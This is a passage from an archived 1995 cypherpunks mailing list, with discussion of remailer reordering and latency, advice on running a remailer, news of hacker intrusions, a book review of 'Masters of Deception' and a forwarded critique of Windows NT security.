            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 76 6F 4B 56 B1 AC 05 FE  BE 39 9D CC 18 E4 F6 68
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Thu, 26 Jan 95 05:17:59 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency
In-Reply-To: <199501260638.BAA07072@duke.bwh.harvard.edu>
Message-ID: <Zrv9laa0isxK078yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Jan, Adam Shostack <adam@bwh.harvard.edu> wrote:

> [quoting another Cypherpunk]
>  >>>> traffic analysis (which is an art, not a science, remember).
> 
> 	Are you sure TA is still an art?  The NSA has (presumably)
> spent thousands of man years on the problem.  Hal, Wei Dai and others
> have done some very good work.  While I've only skimmed the surface of
> it, its clear that clever statistical work comprises a lot of TA.

Adam is correct, as least if you believe Bamford.  _The Puzzle Palace_
lists some of the courses in the NSA's 3-year Traffic Analysis Intern
Program, along with some entertaining questions from the Agency's
aptitude test designed to ferret out potential traffic analysts.  IMO,
far more science than art is involved.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyegOlRRFMq4NZY5AQFACwP9F5usLixVxAm8SxMIK8D9SVWk6j3bWNwL
FgD9sgPGiPJnXhoJVG/OcJnxG1kyvYCiyA1D8WV8m4vMvVAoq83fvtXbCHYd7hit
TjkieVjajKthWDpRlcPaRYFv1QfVTuUHkYbTNZpCfhkcuDenPTe9Uo5ZeB/qWZUz
oe4eZWc3L10=
=87WF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Thu, 26 Jan 95 06:37:47 PST
To: cypherpunks@toad.com
Subject: anon.penet.fi compromise?
Message-ID: <199501261437.AA18444@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


This was in alt.2600.  Comments or verification?
---------------------------------

From: will@rmii.com (Will Spencer)
Newsgroups: alt.2600
Subject: Re: remailer security?
Date: 24 Jan 1995 15:48:57 -0700

Steve:

The penet database was stolen and posted on Unphamaliar Territories.

                                                                Will





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 26 Jan 95 08:50:23 PST
To: cypherpunks@toad.com
Subject: Re:  Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501261649.IAA21706@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Michael Handler <grendel@netaxs.com>
> On Wed, 25 Jan 1995 Louis Cypher wrote:
> 
> > In recent discussions, the consensus 
> > was that message reordering was superior to (and the actual intent of) 
> > latency.  Reordering is not sufficient, a form of latency is required 
> > to make it effective.
> 
> 	I have literally hundreds of messages archived from the CP list of
> several months back where Eric Hughes repeatedly states that reordering,
> not latency, is the key. Reordering of a sufficient magnitude will
> introduce latency inherently. Otherwise you are still vulnerable to 
> traffic analysis (which is an art, not a science, remember).

I think there is a small terminology problem here.  In Eric's writings,
latency refers to delaying message remailing; reordering refers to
sending messages in a different order than they arrive.  I think it is
obvious that reordering is necessary in order to have any mixing; latency
may provide reordering, but it is not guaranteed to do so.  Latency
without reordering is not of much use.

More recently the discussion has been contrasting simple batch reordering
versus a form of reordering where some messages are "carried over" from
one batch to the next.  In the recent context this carry-over process is
being referred to as adding latency.  I think the recent comments about
the advantages of latency refer to the additional statistical confusion
which this carry-over process may add.

So these comments don't contradict Eric's earlier statements, but rather
the terminology has shifted slightly.  Reordering is still the primary
necessity; now it appears that reordering with some latency (carry-over)
is superior to simple batch-based reordering.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLyfSgBnMLJtOy9MBAQH2CwH/WbGPjJmI8yDmlfOblU+fbC9+tlqILluQ
UpAxSFUg00u2QpHdA2a52Yvzb7Oi+oe6WvwdZ7SBFfbLTksa8Q8FVg==
=hWiJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 26 Jan 95 09:30:35 PST
To: Brad Dolan <bdolan@well.sf.ca.us>
Subject: Re: Get ready to start breaking rocks for Herr Klinton
In-Reply-To: <199501260630.WAA24101@well.sf.ca.us>
Message-ID: <Pine.SUN.3.91.950126092056.277A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Well, there was one ray of hope in Klinton's Executive orders:


> . . .  
>                      EXECUTIVE ORDER
>   
>                       - - - - - - -
>   
>      PRESIDENT'S ADVISORY BOARD ON ARMS PROLIFERATION 
> 			 POLICY
>   
> . . .  
>        Section 1.  Establishment.  There is established 
>   within the Department of Defense the "President's 
>   Advisory Board on Arms Proliferation Policy" 
>   ("Board").  The Board shall consist of five members 
>   who shall be appointed by the President from among 
>   persons in private life who are noted for their 
>   stature and expertise regarding the proliferation of 
>   strategic and advanced conventional weapons and are 
>   from diverse backgrounds.  The President shall 
>   designate one of the members as Chairperson of the 
>   Board.
>   . . .

With his arms control policy background and current familiarity 
with crypto as non-exportable munition, Phil Zimmermann is a 
shoo-in for a seat on the president's Arms Proliferaton Board.
Hell, he ought to be the Chairperson!


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sorr@roch0.eznet.net (Steve Orr)
Date: Thu, 26 Jan 95 06:48:49 PST
To: cypherpunks@toad.com
Subject: Okay, okay!!!!
Message-ID: <199501261437.JAA21887@roch0.eznet.net>
MIME-Version: 1.0
Content-Type: text/plain


To all list subscribers:
  I get the picture.
  I apologize for lurching into your space, but I had good reason. I was
trying to track down a bit of information. I tracked it down. The
information was right. Now I'm done.
  Thanks to all of you who took a moment to explain to me what toad.com is.
As for those who took a moment for abuse, hey, I don't care. I'm a
journalist. Taking random abuse is part of my job description.
  As I mentioned above, I have verified to my satisfaction that someone
"borrowed" the machine that runs toad.com and used it to commence burrowing
into the computer space of Tsutomu Shimomura, the San Diego
computer-security expert who got cracked in late December.
  Is this a big deal? No, not really. It's a line or two in the story I'm
writing, which seeks to detail the scope of the intrusions. The story's not
intended to scare people. Nor is it intended to hype anything.
  It's just a story.
  So that's that. Again, sorry for intruding and thanks for the help.
  You can return now to your regularly scheduled programming.
Steve Orr,
at the f****** Gannett Rochester Newpapers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Karl Lui Barrus <klbarrus@owlnet.rice.edu>
Date: Thu, 26 Jan 95 07:42:20 PST
To: morpheus@math.whitman.edu (Mo Baxter)
Subject: Re: Starting a remailer
In-Reply-To: <Pine.SOL.3.91.950125195543.7649A-100000@calvin>
Message-ID: <9501261541.AA10742@snowy.owlnet.rice.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mo Baxter wrote:
>I need info on what's needed to operate a secure remailer out of an edu
>address.  I'd appreciate anything about software, installation, maintenance,
>problems, etc... 

If you are thinking of setting up a remailer on a general usage type
unix shell account, then first find out if the usage policy allows you
to run one (for example, remailer are forbidden here at Rice).
Actually, I would recommend asking first, to head off future
headaches, as I can think at least two other (former) remailers run at
.edu sites that were forced to close.

Other than that, try to find out if sendmail logs are kept, especially
if they are world readable (this will reduce the security of the
remailer, but you won't be able to anything about it anyway).

The software is easily available, installation isn't hard (you have to
install PGP as well).  Maintenance isn't much unless you expirement
around.  I would recommend blocking anonymous mail to whitehouse.gov
and other similar addresses.

I don't know about problems; I never had any, but these days it seems
more and more people are finding out about remailer, and with that
comes abusers.  John Perry had to shut down because of abuse, after
withstanding the RC4 posting crisis.  Be prepared for some hassles.

Actually, I would recommend finding a remailer-friendly site like
c2.org and setting up there.

-- 
Karl L. Barrus: klbarrus@owlnet.rice.edu         
2.3: 5AD633;   D1 59 9D 48 72 E9 19 D5  3D F3 93 7E 81 B5 CC 32 
2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5  E8 97 64 7E 20 95 60 D9
"One man's mnemonic is another man's cryptography" - K. Cooper



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kevin@elvis.wicat.com
Date: Thu, 26 Jan 95 09:26:14 PST
To: cypherpunks@toad.com
Subject: MixMaster remailer source
Message-ID: <9501261726.AA18771@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


    A little while back when the "remailer crisis" discussion was in
full swing, L. McCarthy recommended the Mixmaster remailer as being the
most modern. After several days of hunting, I have utterly failed to
turn up the source to this remailer. Can anyone provide me a pointer?

    On a slightly related note, is there a validation suite for PGP? The
MIT distribution does not include OS/2 binaries, unfortunately, but I
have managed to get a clean build. It seems to work, but I simply don't
know enough about PGP to be sure that it really is a fully working
verson.

    Kevin

    At Intel, quality is job 0.999731.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Thu, 26 Jan 95 08:54:40 PST
To: sorr@eznet.net
Subject: RE: Identity
Message-ID: <950126105452.6824@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain



Gannett sucks.

Kare 11 sucks.

USA Today sucks.

St. Cloud 
Times sucks.

Gannett==sucks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Thu, 26 Jan 95 08:25:59 PST
To: cypherpunks@toad.com
Subject: Re: Unix, Linux, NeXTStep, etc.
Message-ID: <199501261622.LAA22690@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501260513.VAA11989@netcom7.netcom.com>,
Timothy C. May <tcmay@netcom.com> wrote:
>I was about to say the same thing! Not to push NeXTStep per se, as it
>is apparently doomed for a variety of reasons,  but to say that
>popular applications can be--and have been--ported to Unix.

Actually, while NeXTStep per se may be doomed, its spirit might very
well end up surviving.  The move towards integrating it with Solaris 2
and other vendor unices is a heartening one, to say the least.

I still want a WYSIWYG editor that spews TeX.
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyeTTBNhgovrPB7dAQHqzgP/UGxrIMKUMHVneOLPHu7yRkjm7CztPIzu
E46PIPt2ZXdnMDIvHAGekx3SZ8tH1EY6Fl/MBHpYrUxh6XRY+MsaPw8JlAi8cs3t
cEfsyS1GbZ50z3731CQcjS7HDX7PGCYqjxm8fMqvEx8Z0BrrhGnWfBdq8Caonpyt
MRFG2uoyIBo=
=F4SP
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyfMISoZzwIn1bdtAQFOYQF9FtrdZCf390uGkHjwfK+BWCpYcGv3uj0w
eV5X0B36qrocwT9Sma3agHRx5AWsS4RV
=tOUY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 26 Jan 95 08:21:24 PST
To: cypherpunks@toad.com
Subject: Re: Fuck Gannett
In-Reply-To: <199501260302.DAA18137@ns.cityscape.co.uk>
Message-ID: <199501261623.LAA06539@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone wrote anonymously:
> Fuck Gannett.

Keith Cross writes:
# I'm glad it was said

Why ?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jallen@pen.k12.va.us (Jeffrey C. Allen)
Date: Thu, 26 Jan 95 08:30:28 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Electronic Security
Message-ID: <9501261630.AA155529@pen1.pen.k12.va.us>
MIME-Version: 1.0
Content-Type: text/plain


I have been lurking for a while, trying to learn.

Someone asked about electromagnetic shielding.  I remembered an
article in Popular Science.  It was July 1989 on p. 87.  It
described a _fabric_ which provided 100 dB of shielding.  I
have not used it, but thought I would pass on the reference.
It is called Saf'n'Shielded and is produced by International
Paper.  Hope this helps.
-- 
{---------------------------------------------------------}
J. C. Allen
Ass't. Technology Coordinator
Episcopal High School
Alexandria, VA  22303
jallen@pen.k12.va.us
{---------------------------------------------------------}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmueller@gac.edu
Date: Thu, 26 Jan 95 09:43:07 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Privacy of Voice Mail?
Message-ID: <199501261742.LAA19832@shadow.gac.edu>
MIME-Version: 1.0
Content-Type: text/plain


From 1/24/95 Edupage

Forwarded message:
> 
> HOW PRIVATE IS VOICE MAIL?
> A lawsuit filed by a former McDonald's employee whose private voice mail
> messages to his paramour were recorded and played for his wife may
> determine the question of whether voice mail boxes are granted the same
> confidentiality protections as live telephone calls or postal mail. The
> ACLU argues that electronic eavesdropping should be avoided, but the U.S.
> Chamber of Commerce takes the stance that businesses have the right to
> ensure their electronic equipment is used for legitimate purposes.
> (Times-Picayune 1/23/95 A3)
> 

Comments?

--
    Joel Mueller - "Here lies one whose name is writ in water."    -Keats
   		   Check my .plan for my PGP Public Key.  
 		    PGP encrypted mail is very welcome!
  This must be Thursday.  I never could get the hang of Thursdays.  -Dent



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Jan 95 08:55:51 PST
To: cypherpunks@toad.com
Subject: NYT on MOD
Message-ID: <199501261655.LAA27828@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 26, 1995, p. C17 
 
 
   Books of the Times 
 
 
   Kids or Conspirators: How Hackers Got Caught 
 
   MASTERS OF DECEPTION  
   The Gang That Ruled Cyberspace 
 
   By Michelle Slatalla and Joshua Quittner  
   225 pages. HarperCollins Publishers. $23. 
 
 
   By Chirstopher Lehmann-Haupt 
 
 
   It's difficult to feel much besides amused admiration for 
   the computer hackers spotlighted in "Masters of Deception: 
   The Gang That Ruled Cyberspace," by Michelle Slatalla and 
   Joshua Quittner, a married couple who are reporters for 
   Newsday. After all, what mainly characterizes the gang of 
   adolescents they write about is high intelligence, infinite 
   resourcefulness and boundless curiosity. 
 
 
   Among the Masters of Deception, as the gang is called, 
   there is Paul Stira, nicknamed Scorpion, who as a child 
   learned to program a computer even before he had his hands 
   on one and went on to master the art of cracking 
   computer-game copy-protection codes. Mark Abene, a k a 
   Phiber Optik, was so driven to understand how machines work 
   that he explored and mastered the most sophisticated of the 
   telephone company's computers. 
 
 
   Eli Landopoulos, or Acid Phreak, after helping lure Phiber 
   Optik away from a rival cyberspace gang, Legion of Doom, 
   was moved to write "The History of MOD" for other hackers 
   to envy. And John Lee, or Corrupt, found computer hacking 
   a better way to survive than running with a street gang. 
 
 
   It is difficult for the reader of this book to look upon 
   these and other members of the gang as criminals. Yet they 
   were eventually charged by a New York grand jury with 
   conspiring to "gain access to and control of computer 
   systems in order to enhance their image and prestige among 
   computer hackers," among other counts. And they ended up 
   pleading guilty and serving jail terms, which they have 
   completed. 
 
 
   In telling their stories, Ms. Slatalla and Mr. Quittner 
   have almost as hard a time finding a continuous thread as 
   the Government did building a coherent case against the 
   hackers. The authors begin by describing a crash of the 
   AT&T long-distance system that occurred on Jan. 15 1990. 
   The authors write of the gang's reaction to this crisis: 
   "No self-re-specting computer hacker would ever destroy 
   anything. No hacker would ever purposely hurt the phone 
   system. Paul just wanted to look around. He just wanted to 
   learn more. He'd know it if he'd done something bad. 
   Wouldn't he?" 
 
 
   The lively narrative then backtracks to tell how the 
   hackers formed their gang the previous year. This sequence 
   creates the impression that the gang will turn out to have 
   caused the crash, an expectation that is buttressed by 
   other evidence that Ms. Slatalla and Mr. Quittner describe. 
   The boys crashed smaller systems they invaded, like the 
   Learning Link, a collection of electronic bulletin boards 
   for educators and librarians that is owned by Channel 
   13/WNET, New York City's public broadcasting television 
   station. 
 
 
   The gang left the message "Happy Thanksgiving you turkeys, 
   from all of us at MOD," which prevented access to the 
   bulletin board's files. As the authors write, "the Learning 
   Link crash would become the pivotal event in the case that 
   the Federal Government was slowly building against the boys 
   in MOD." The process was slow because the investigators had 
   to weigh the need for evidence against the risk of damage. 
   As the authors write: "It was kind of like having a 
   tarantula crawl up your leg. If you shook it off too fast, 
   it would escape into the wall. But if you waited too long, 
   you got bitten." 
 
 
   But when, about half way through the book, the narrative 
   arrives back at the AT&T crash of 1990, we learn that the 
   failure was traced not to anything the hackers did but to 
   what the author's describe as "a routine update of the AT&T 
   software." True the gang did much that was wrong like 
   creating and using unbillable telephone accounts, 
   trespassing in cyberspace to make long-distance calls, 
   looking up private information and using it to harass other 
   hackers and stealing and selling other people's credit card 
   numbers. 
 
 
   In short, certain members crossed the line between hacking 
   and cracking and thereby violated the hacker ethic, which 
   holds, in the authors' words: "Thou shalt not destroy. It's 
   O.K. to look around, but don't hurt anything. It's good 
   enough just to be here." 
 
 
   Yet the fact remains that the gang did not cause the AT&T 
   crash. And the worst that was done appears to have happened 
   at a remove from what Mr. Abene was responsible for and 
   after Mr. Stira had more or less withdrawn from hacking. 
   Yet these two received the stiffest sentences. Mr. Abene, 
   the last to complete his sentence, was released in the fall 
   of last year. So one has the impression that what mattered 
   to the Government was less the mischief done than the 
   potential for mischief. 
 
 
   What the slightly jumbled narrative does capture 
   effectively is the contrast between the manic glee of the 
   hackers at the prospect of a vast new unexplored world to 
   conquer, and the Government's nervous disapproval and 
   understandable need to set limits on a mysterious new 
   frontier. The authors try to present both points of view. 
   They don't reveal where their sympathies lie until the last 
   line of their book. Here, after describing the meeting of 
   a hackers' club as "the milling clumps of boys" who "are 
   the picture of entropy, of disorganization, of isolated 
   growing pains and undeveloped social skill," they write 
   with tongue in cheek as their concluding paragraph: 
 
 
   "This is the conspiracy." 
 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:12:13 PST
To: Kevin Marcus <datadec@cs.ucr.edu>
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <9501261711.AA16623@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Kevin Marcus says:
> Unfortunately, however, there are a lot of things that a lot of people can't
> do in a unix system.  Unix is probably the most widely used unfriendly
> cryptic, and complicated operating system today.

Unix is perfectly easy to use. Its no worse than DOS.

I'm constantly amazed by people saying "why, Unix is so unfriendly!
What does "ls" mean to a naive user". Well, what does "dir" mean to a
naive user? Since when is "dir" the intuitive way to list the contents
of something?

Now, its true that Windows is friendlier than DOS, but there are good
windowing systems on Unix that provide equally easy to use front ends.

Anyone who claims that "Unix" is unfriendly hasn't looked at the
machine that they are using -- or they are bigots who think that the
strange commands that they know are natural whereas other people's are
magically unnnatural.

> With the upcoming of
> Linux, this will probably change somewhat in the future, but until I can
> teach my secretary how she can use latex to type and print her letters, we
> are going to be stuck with getting us whatever the bastards at MicroSoft
> think we want.

Teach her how to use FrameMaker, or IslandWrite, or something
similar. IslandWrite is no more unfriendly than MacWrite was. If you
want to teach her to use latex, thats actually quite feasable, but its
not needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 26 Jan 95 09:23:02 PST
To: cypherpunks@toad.com
Subject: An article on Windows (in)security
Message-ID: <9501261717.AA08133@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
>From: first@individual.com (An Information Service of INDIVIDUAL Inc.) (by
>way of
[Some initial stuff seems missing, sorry.]

>  ``No.''
>
>  And so it went. Once the security configuration is established and the
>security profiles are put in a database-like protected file system,
>accessing that data to get a full view of the security policy implementation
>is near impossible. An administrator must retrieve individually each piece
>of data stored in the security database, then manually collate and compile
>it into a usable form.
>
>  In a large operation, the security administrator will build a security
>database by virtue of the number of objects and characteristics assigned to
>each object during configuration. But Windows NT offers little way to access
>and manipulate that database for analysis, rapid reconfiguration or global
>views. It appears, and Microsoft engineers agree, someone will have to build
>a utility program to take advantage of the security database via the maze of
>APIs available to third-party developers.
>
>  Kevin Phaup, program manager lead of Microsoft's Business Systems
>Division, put the best spin he could on this first major Windows NT
>shortcoming. ``Pull the data into a database and then massage it,'' he said.
>``We have a new product - System Management Server from the Back Office
>Suite - that could help.''
>
>  I agree, but why would I want to buy a brand-new operating system that
>needs help out of the box?
>
>  What's more, the third-party database solution for security administration
>is a hopeless short-term patch. To be truly effective, it needs a much
>tighter integration with Windows NT's APIs to permit not only systemic
>analysis, but also systemic security changes based on selected criteria.
>
>  If administrators want to change the access rights of every user so they
>can log on at 7 a.m. instead of 8 a.m., they cannot do it with Windows NT
>3.5. They might be able to do it with a third-party product or with Windows
>NT 4.0.
>
>  ``If someone builds an administration product like that, they'll make a
>lot of money,'' Phaup says.
>
>  A  WEEKEND'S  WORK  Windows NT has other security problems, as well. For
>example, it does not have data cryptography, which is essential to make sure
>a network is reasonably secure from eavesdropping and integrity breaches.
>Microsoft, which knows encryption technology, easily could have included the
>appropriate algorithms in software to make Windows NT more secure.
>
>  Microsoft's Phaup agrees it would have been simple to add encryption to
>Windows NT. ``The hooks are all there,'' he said.
>
>  But Windows NT does not need cryptography for C2 certification. And
>perhaps even more telling, Microsoft cannot export cryptography outside the
>U.S. due to export control laws that prohibit it from doing so without
>licensing. Of course, the company could have made two versions of Windows
>NT: one with crytography for domestic use and one without cryptography for
>export.
>
>  According to Phaup, Microsoft was reluctant to do so for two reasons.
>``Security is way down on the list of corporate concerns and desires and
>wants in an OS. It's in the top 20, but not the top 3,'' he says. ``And the
>testing cycle would have been a double killer.''
>
>  Windows NT's last major shortcoming lays in the omission of a feature that
>most security experts consider virtually indispensable: boot control.
>
>  In the DOS/Windows world, third-party PC security is reasonably attempted
>by forcing users to boot from the C drive and making them log on with IDs
>and passwords. However, if a bootable DOS diskette is inserted in the A
>drive, the PC will boot without a logon, and the A:> will appear.
>
>  But if the user attempts to log over to the C drive, the system will come
>back with a message such as: Invalid drive specification. Security experts
>recognize this as an inexpensive technique that will keep out casual
>intruders and nontechnical types.
>
>  One way to mandate boot control is with a hardware or firmware addition to
>the PC in the form of an add-on card. The hardware boot process is
>interrupted, and then even access to the A drive can be restricted until the
>actual logon process through the legal boot drive has been successfully
>completed.
>
>  In Windows NT, boot control does not even exist as an option. Again, this
>suggests that Microsoft's security effort was driven by C2 certification,
>not by security itself.
>
>  In its defense, there is a lot to like about Windows NT and the plethora
>of functionality it offers from the application standpoint. But Windows NT
>sorely lacks in security, so much so that it almost would be safer not to
>use any security.
>
>  Windows NT must evolve quickly to garner a spot in the secure operating
>system arsenal or somehow steal market share from the likes of Novell. It
>just is not there yet. But Microsoft's Phaup left me with one closing
>thought. ``Have you talked to the Cairo [Windows 95.5] guys yet?''
>
>  2Schwartau is an independent consultant, writer and lecturer on network
>security topics. He can be reached at Interpact, Inc. at (813) 393-6600, or
>via electronic mail at P00506@psilink.com.
>
>[01-23-95 at 15:10 EST, Copyright 1995, Network World, File: x0123303.8dn]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:20:17 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <199501260638.BAA07072@duke.bwh.harvard.edu>
Message-ID: <9501261719.AA16636@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack says:
> It may be that the FBI has a couple of Suns handling the whole
> remailer network right now.

If they are doing that, they are violating the ECPA. They are allowed
to monitor only those things they have a warrant to monitor (with, of
course, all those lovely National Security exceptions). This is not to
say that it isn't being done, but it can't be used in court.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 26 Jan 95 09:45:36 PST
To: M00012@kanga.stcloud.msus.edu
Subject: Re: Identity
In-Reply-To: <950126105452.6824@kanga.stcloud.msus.edu>
Message-ID: <9501261745.AA16711@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Leaving our terminal unattended, or are we just still waiting for our
lobotomy?

.pm

M00012@kanga.stcloud.msus.edu says:
> 
> Gannett sucks.
> 
> Kare 11 sucks.
> 
> USA Today sucks.
> 
> St. Cloud 
> Times sucks.
> 
> Gannett==sucks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Greenberg <0007333626@mcimail.com>
Date: Thu, 26 Jan 95 12:56:02 PST
To: "cypherpunks@toad.com>
Subject: Remote command execution PGP script
Message-ID: <24950126180642/0007333626PJ1EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain


About a year and a half ago one of the Perl wizards on this list posted a
script which would alllow you to mail a PGP-encrypted script to an account
and (if the signature checked out) execute the script on the remote system.
This would be extremely useful to me right now.  Anybody have a copy of
that script so that I don't have to reinvent the wheel?

                                         Thanks,
                                         Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 26 Jan 95 13:23:11 PST
To: klbarrus@owlnet.rice.edu (Karl Lui Barrus)
Subject: Re: Starting a remailer
In-Reply-To: <9501261541.AA10742@snowy.owlnet.rice.edu>
Message-ID: <199501262120.NAA10701@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Ah but if you *really* want to run out of an .edu address,
contact me about getting an alias in leri.edu.


> 
> Mo Baxter wrote:
> >I need info on what's needed to operate a secure remailer out of an edu
> >address.  I'd appreciate anything about software, installation, maintenance,
> >problems, etc... 
> 
> If you are thinking of setting up a remailer on a general usage type
> unix shell account, then first find out if the usage policy allows you
> to run one (for example, remailer are forbidden here at Rice).
> Actually, I would recommend asking first, to head off future
> headaches, as I can think at least two other (former) remailers run at
> .edu sites that were forced to close.
> 
> Other than that, try to find out if sendmail logs are kept, especially
> if they are world readable (this will reduce the security of the
> remailer, but you won't be able to anything about it anyway).
> 
> The software is easily available, installation isn't hard (you have to
> install PGP as well).  Maintenance isn't much unless you expirement
> around.  I would recommend blocking anonymous mail to whitehouse.gov
> and other similar addresses.
> 
> I don't know about problems; I never had any, but these days it seems
> more and more people are finding out about remailer, and with that
> comes abusers.  John Perry had to shut down because of abuse, after
> withstanding the RC4 posting crisis.  Be prepared for some hassles.
> 
> Actually, I would recommend finding a remailer-friendly site like
> c2.org and setting up there.
> 
> -- 
> Karl L. Barrus: klbarrus@owlnet.rice.edu         
> 2.3: 5AD633;   D1 59 9D 48 72 E9 19 D5  3D F3 93 7E 81 B5 CC 32 
> 2.6: 088C8F21; 97 73 9E 8B 98 3E DD B5  E8 97 64 7E 20 95 60 D9
> "One man's mnemonic is another man's cryptography" - K. Cooper
> 


-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 26 Jan 95 11:24:06 PST
To: perry@imsi.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <9501261922.AA07092@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Adam Shostack says:
>  > It may be that the FBI has a couple of Suns handling the whole
>  > remailer network right now.

Perry Metzger replies:
>  If they are doing that, they are violating the ECPA. They are
>  allowed to monitor only those things they have a warrant to monitor
>  (with, of course, all those lovely National Security exceptions).
>  This is not to say that it isn't being done, but it can't be used
>  in court.

Is this even technically possible?  That is, wholesale monitoring of  
disparate portions of the net from a single access point.  Given the  
distributed and dynamic properties of the Net this would seem impossible.  To  
monitor the entire remailer network an attacker would have to setup packet  
sniffers upstream from each and every portion of the Net that contained a  
remailer, wouldn't they?

I suppose an extremely resourceful attacker could monitor traffic at crucial  
points (i.e. transcontinental feeds, points on the NFSnet, CIX, etc...), but  
there are so many private connections linking networks that it would be very  
difficult indeed to sniff out every bit of remailer traffic.  Is having every  
